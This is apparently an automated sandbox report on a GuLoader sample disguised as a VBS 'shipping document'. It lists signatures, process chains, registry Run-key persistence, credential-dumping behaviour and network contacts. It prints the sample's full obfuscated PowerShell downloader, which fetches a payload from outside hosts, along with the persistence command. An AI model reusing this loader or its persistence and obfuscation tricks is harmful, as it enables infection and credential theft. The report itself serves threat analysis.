Malware Analysis Report

2024-10-18 23:09

Sample ID 240521-qfhfvafb4v
Target nShipping document.lzh
SHA256 a1f794f5781ade202f9cbd9fc08e7f3e3b8d737792cc594c093bb4979a7ecbe4
Tags
persistence guloader collection downloader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a1f794f5781ade202f9cbd9fc08e7f3e3b8d737792cc594c093bb4979a7ecbe4

Threat Level: Known bad

The file nShipping document.lzh was found to be: Known bad.

Malicious Activity Summary

persistence guloader collection downloader

Guloader,Cloudeye

NirSoft WebBrowserPassView

Nirsoft

NirSoft MailPassView

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Accesses Microsoft Outlook accounts

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-21 13:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-21 13:12

Reported

2024-05-21 13:14

Platform

win7-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping document.vbs"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Slidfladerne = "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\\Rewets\\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2480 set thread context of 2852 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2104 wrote to memory of 2140 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2140 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2104 wrote to memory of 2612 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 2592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2612 wrote to memory of 2480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2480 wrote to memory of 3000 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 2852 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2852 wrote to memory of 2832 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2832 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping document.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 8.8.8.8:53 madibarohilalatwo.duckdns.org udp
DE 84.247.187.12:80 madibarohilalatwo.duckdns.org tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 tcp

Files

memory/2612-4-0x000007FEF5F4E000-0x000007FEF5F4F000-memory.dmp

memory/2612-5-0x000000001B750000-0x000000001BA32000-memory.dmp

memory/2612-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

memory/2612-7-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2612-9-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2612-8-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1NE92LMC8BK2XWEVM1LD.temp

MD5 37568a484225754c447b944083c059ef
SHA1 aef4a7192518d1f70854569451fc678d936f0f05
SHA256 49448ec9cab2abe971568c418817850d73ab2906ed2d50cdd6086d3666f08957
SHA512 d18e88526dcb2c8d3a993a6cd8959b87805b6158350c4bc430febf67654a4cf368a4363b4277b988a3f10e2690c69748b877604173c4ce108b31607b2166a2af

C:\Users\Admin\AppData\Roaming\Contributors.Pap

MD5 6d3d810b1b531a393dd8a200f17378b8
SHA1 bc31c057297d2b467a46d843030f1ff377f55f1e
SHA256 786447c3a5269cec661eb9e7bea51a58df805afaceb116677ff1974cc0d6d7df
SHA512 a77ecb7cc1d0bb183fdef43747f7156bd72e5fcb32e2e8c7671a926707b313245e08b682ce03b6b862f9f4ff1f62cf566d98fbde3384c67b60c0a2cb8dcbf358

memory/2612-15-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2480-16-0x00000000065F0000-0x0000000007AE1000-memory.dmp

memory/2612-17-0x000007FEF5F4E000-0x000007FEF5F4F000-memory.dmp

memory/2852-19-0x00000000005B0000-0x0000000001612000-memory.dmp

memory/2612-26-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-21 13:12

Reported

2024-05-21 13:14

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping document.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Program Files (x86)\windows mail\wab.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Slidfladerne = "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\\Rewets\\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2304 wrote to memory of 776 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 776 wrote to memory of 4260 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2304 wrote to memory of 260 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 260 wrote to memory of 2384 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 260 wrote to memory of 1640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 3732 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1640 wrote to memory of 4504 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 4456 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4456 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4504 wrote to memory of 4216 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 2604 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4504 wrote to memory of 4696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipping document.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undialyzeds = 1;$Forespeech='Sub';$Forespeech+='strin';$Forespeech+='g';Function Mikado($Firebolted){$Martyrologic=$Firebolted.Length-$Undialyzeds;For($Femalizes49=7;$Femalizes49 -lt $Martyrologic;$Femalizes49+=8){$Trompetdyrenes+=$Firebolted.$Forespeech.Invoke( $Femalizes49, $Undialyzeds);}$Trompetdyrenes;}function Xylyl($nougats){. ($Sprinklervsken) ($nougats);}$Guilts=Mikado 'MisbirtMm alretoOblongiz MustafiEnglevilAfkol,nl Larigoa.alteri/Metagna5 Stab.l. egions0Asbku,h Untaun.(BelejriWAssociaiUdviklin bagestdRutscheoGejstliwSagsgansBlokpol IndonesNLaboratTo forme L.isure1,ladtan0 Ran.or.Apertne0rodknol;Sultegr algesi.W S,riveiAddi,ten Lin eb6Do.atio4Elaph.d;St.vnsb Enc,untxSeed ng6 ,ogica4Adiposi;Kvindes FutilizrRugbrdsv Transi: Nongol1Bun tsd2 Denoun1Bortdmm. Me,red0Opkalds)Delites arbejdsGPalaeogeArchesic,ekognoktkkendeoUpassel/Rouil.e2Spirant0Photote1Slutpun0eftertr0 Stumbl1Hu dehu0Recitat1Hjlpe,n elsenfFGossa ei SimultrUberegneIndeksefWharfraoAftalevx To.sio/Forvalt1Painles2Drivers1I,dsmig.Cocksho0Tantiem ';$Fuldbragtes=Mikado ' ImerinUForegris Redeareti.balerJunkboa-Bon.sesACatchm gSi kerheModer,inForrykttPletter ';$Spinituberculate=Mikado ' BrndemhIndividtindsendt BankospPau,eris.nnovat:Balleti/Fossaeu/V,lfundc Al inaa OddlegdKostskoeBlokadenSeend saAmatrskdCult kle GummibrOrangeaeO,tendegBogiemaaNy etipl.ositiooCardioms.envisn.Debtorsc GravhjoNonpuebm Endoph/Ti,glysTKlbebaaoMisderiicarcasslAdresseeFilmogrtSemicelp Fil,inaSjlsr.apEkspedii .aabenr Ol,gis.Rooti.rdRispendeHumpssaptevarmel Geestso LgnersyInbitsb>Universh,ogonghtSy,kemat An,etlp Chempa:Kommpre/ Melipo/ Anderum HysteraDiabetedKammendiJefest.bVetiveraThrowworStaalvroPlacenthInnuendiGlitr tl Paral.aFortonel Glairea,mmutabt,ontradwNonprodoHunde l. 
Futurod tudercu Mudredcover,igkDe.angsd Macrocnpho.osks verflu.Tbrudsso To.seirRadiovigBrasero/VolitioaVrvlehilAllainelTotalsy/PhrynidTEtymo oo Roque.i,nterkolFilialseAfviklit UdaandpJentjenaHjertevpChackeri DividerEskadre.AntisufdNonst meCater.npbackbitlFreestooUnpoisey,urstpa ';$Smedningens=Mikado 'Unbutto> Indici ';$Sprinklervsken=Mikado 'KontokbiVolumeteHemihe.x Slingr ';$Cagot='Dockizations60';$Tilskring = Mikado ' K,stnieJan.lerc Bra.dahHande.so Chapta Expansi%Vir uela Elatc p RoughcpPanegy,dsellehyaD.imonitinitialaAchroni%Novelet\ osenstCinhivemo DissennK nnikktParfumergraver,iLsegldeb Cod.scu Starquthamrendo Gas etr Rve agsOlibanu.EpichilPHopeiteaUudslukpscuttl. Th,race&Brysth,&Outrefo El borae ProgracBrnesprhHulsle o Witlos plackletAmphirh ';Xylyl (Mikado 'Endolys$CimbrisgWispliklVirkeliopolitikbD,trugcaBgede elKotylef: Dext,if Bl.stoiKroatisrSnow owe ,ignalbParenthoH,idlgeoSenioretDishono=.vyunde(Se nmshc JunglemStarrind Flush. Snuptag/Unenwovc.cicula Supergr$EnsformTR sideniSedlersl Essayes TrammikBotulinrEphebeuiAr.ejdsn DerivegScrimwi)Subclam ');Xylyl (Mikado 'Hyper,c$ Erotisg .rikkelSubd.ntoMesa.icb Blokada Sy,axalIrascib:Bug,hypDBice,tri BagtrasJenmakekMicr tyoTransakgOp,oegerFakticia Jeaporf KroniniViljenssFru.tlekSjattefelegemulsj.gtpro=Jellstu$PamphleSForsinkpChalleni MegalenToralhaiGennembtHumo riuSubd,vibUneffigeSk,ltonr.gsvinbc IlioisuAr,enohlMass oraGent getAcalycae F lset. 
VenstrsAlmenvepBor,deslEls,liniTopske.t.layful(Thermof$Ud.andsS Car.urmGalvanoeShillald P ogrenMateriaiDurriesnA.arerngEjendomeProtoclnStueflus reatta)Indisti ');$Spinituberculate=$Diskografiskes[0];$Illegitimated= (Mikado ' Immite$o ercrigEngramblDraughtoWharfsibShippi aRauwolflSh mpoo:Li.ehooE UnsecllTourellePenitencAtionertAntimonropflgnioTruebludIndavlei Tav.rna InterilInklu,eyOmvekslzSedimene DebatsrTi skri=ReekspoNNedmejneS ltierw Rustvo-Alchem O ntioxibFlja,tejEnchanteSchizo c Pourbot E curs su,keneSNon,oveyMicawbesSaturnitHormonoeOverprim undive.TrsklerNmateriaeNringentTythesr.T,pefliWNyreligeM,nkesmbDeaminaCNaringil stubblirhagioneCheilodnBrugermt');$Illegitimated+=$fireboot[1];Xylyl ($Illegitimated);Xylyl (Mikado 'Englify$Dift,ngE Orni hlVilkaareTr,nsmicSelvk,et aggadirUndtageoTraadkudGentiliiPortr,tapalliatlSor.kjoyTilstrbzEksercie Draftsrunnomin.AfsendeH Rapp leAeroplaaPrangerdPersoniePlanc.er Snitsls ,lektr[Journal$ lcladhFAeonicauFripladlladdersdi,nisatbIntemper,vershoabum,sybgNglepert Subro,eOpisthosA,strin]Jaz,eta= ibrop$,lettebGUnde,feu Reph ti Ansv,rl PassivtScabbiesAnsgnin ');$Akrobat=Mikado ' skamfe$SmadrenESvmmendlForslageDevastecStnkpudtRhamnusr Isobu,odiagonadPeduncliUnstrenaFilatellUnwithdyIxodidszMgtediseNonaccrr.atapho.SystemaD sdvaneoKittieswVerse tnBrs frolHjesteroKorr,spaFjervgtdAf.temnFRastestiArkfde,lCr,dworeMithrai(Supiner$BestignSVristrep omdoebiPro,ptenBlindg,i PapirbtRetouc u,unkersbFejlbehe ayerdorSprogvicOverlreu fontinlGoyetiaaUnmedictReedlikeanattaf,Billard$SkeetbrN FurrileRecursidCydippegSeid mrrSapropeaNoege,hvAtt.akt)Marmo p ';$Nedgrav=$fireboot[0];Xylyl (Mikado 'Udso gt$Fly tengUn,nhablT,talssoBaarebub ScowedaSemikollDa idsf:Omf,rmaLC.orouseProgra.jKajakkeeKarbidlvAutoex rBevidstd PizziciStrong e Mis ikrB,ddestnu derhoeSnashessQual.ag1Malerin2Antithe9Incompr= Onc ov(coron.tTRyghvireFolkekusskubor,tHesitat-InformaPmismateaeksistetReequiphOfayscr Landsk$Trff.lsNFlyvereeAdo neddCellefogPsychoprKuglefoaKirurgevAs,hete)Misplan 
');while (!$Lejevrdiernes129) {Xylyl (Mikado 'Sande,e$Basitemg Af,nnelStoushcoCivildobVerdensaDemilitlStartko:CongregtLark.omrdaisyssy ppositk aftrripEpisiorlH rmitia SekunddDizequ,eAf entnrTyvebetsMancipa=unstout$Afprikkt SupranrSamsvaruk,ittede Ejeste ') ;Xylyl $Akrobat;Xylyl (Mikado 'JdesmicSCe ebrotScrollea,inemasrLaughert aparth-Cardi pSKastanil Skak pe.atamane CostaepMrkbar Prostat4 fistul ');Xylyl (Mikado 'Bevogtn$ untasegBarse,vlTurdansoDosmersbBlegnetaLandingl Assent:Oste.naLHarrowmeSamucanjSmithieeO strukvPerfectr Indruld EchinoiOttili eHysterirU,seignnSyleconeUnexpersTys hed1 Co ege2Stangsp9Rastpla=Kryptis(Engra nTRenskreeSuperins CirkattPriserk-UtaalelP systema DoitsptHenvejrh .omspr Intervi$undespoNPerisyse BambusdNabogitgDebindsrKulturfaHidrrtev Pepton)fdninge ') ;Xylyl (Mikado 'beskfti$smre rag Igua.olap roaco H vnebbSanseapaSfartsblUndisag:Intour.HLsbarhejLitteraoEpi,hylr ThumbptEfterree S,prantFruitwoaSemi,bskFrem.rek LyskureSn bsninOvercom=Bl mmes$ SkaldygB.adgullOverwaro elelitbSkyllevaMisprovl Flydev:Imp rraU DejlignMesomordSpagheteSonogr,rIdeeltscViljeslrkammerje TilskasUdtrykstUerstat1Dackeri6Diedric0 Landst+Engleli+ Eart.m% A,etyl$pupilsbDTjenesti BalkarsGipsd.pk .rikkeoBac risgGopurakrResoluta .rydsff SukkeriSlutfass .lycopkSkibskie NoncussSnkning.KedushacbyudvikoPentecouSanguifn agpiedtSelvris ') ;$Spinituberculate=$Diskografiskes[$Hjortetakken];}$Forlngelseslovs=308238;$udenlandsdanskerne=30330;Xylyl (Mikado 'Nidoros$Er oldeg MilliblLiberalo Ch omebMetzgonaUndervalSimulat:SintredLToppunkvBronzeveparadism CollecaJan.erkn KidnapkWarehoueOveracurRntgenfnFarvetaeMercato Begrudg=Galagal Eje ahoGScalenoeGeneraltSubprep-MusedesC Lsr,fooLimen,enD.scocat,emisapecoronitnJagten.tI.terfi Multiv$Syrer iNAchesove Fo,srgd BaccalgThromborlienteraSagprosvfarvepr ');Xylyl (Mikado 'Syp.ere$Pros,avgAftvinglcibariooUformaabfremelsaBet linlR,stjer: Lrre,sUEsk,ldsn AnskuebPreplacrT,ssesuoSpildola Ra,pedc Mi,ieuha.simileKana iedKommise Blodser=Unhypot 
Kilomol[.epleteS Pentagy Bobes.sStegenetValvulae talblomInterre.aneurinC Lrest,oUbefjednPlastikvLskedr.e oolierrSolmodntHaglgev] Hypos :,rocivi: Sk,mplF etrolar.dringsogracioum JumperBAfterdaaGadel usIndenrieprogram6icteric4 VinderS Granult Sulphar IncaseiLondonen Nonparg Hovedr(persona$BautastLTaxaudlvTranspieSleth gmW.ltonbaMo phinnSanseorkAgariciejazzmusr MatsornBeregnieDiethyl)Skibspr ');Xylyl (Mikado 'Nove,in$StoachsgRevokselSystemeoGra.ciabIsomer.aEnfoldil gifted:Overh nUManicurrAgentureTempyogdUnrollme,ksekvetZin,ify edisma=Glycero Mollusc[UrgoniaSSin ulayNoncancsForetyptOverproeOveri.ym Kryd h.TelotreT R bstieEkviperx Sprogft L poli.bevilliEMatchsanBevislicSystempoBe onardForskriiM,lticonHalshvigTacheom]Acervat: ster,l:SolospiASpinketSM toposCbuskrseI,etoolsIBestykn.LavatoeG egisteedisapprtUds,yknS NondiftBo.tlbnrDa regniPhenospn rdigmogStikfor(Stuearr$TilhyllULegaliznliannatbNonsimurSpaanplo TophueaStanke,c Xip.ochmakro aeSmovsetd,ecolor)Hng,nde ');Xylyl (Mikado 'Klatvas$ryg,adeg StaveslYeom,nloAutomobbBestia a un.labl Telefo: ummertBTroloveeFakticir .esvrlibudg tslKassebgdUdgiftssElektro=Mistill$ Zamar,UOutbo,ir PestereGau.sfid Knarkee evaport T resn.ElixatisNoninteu OphidsbCuticulsN,ncommtinvent rSp.rrowiPsykotene,evatogRitu,li( Penepl$ ci iusFF,nansloHydrolorBrndk mlMelolonnTrst,trg.kftedeeSankthalDia,kopsS,beslaeF ockres enckesl MaadenoSwazilnvAngelihsSalgsch,Lutoses$NattelyuAs icsmdco,certeComputenSlvtjsslPostulaanontra.nHj.rnevdEncolors AnguludR,eoptaa mmersenParrings afspilkErkendeeSinopiarKorr,mpnGulfedpeTonomet)grund t ');Xylyl $Berilds;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\fncgvusxhvdvdl"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hihzomkyvdvzfrhgv"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\sknrpfvsrlneqxdkeina"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 125.68.49.198.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
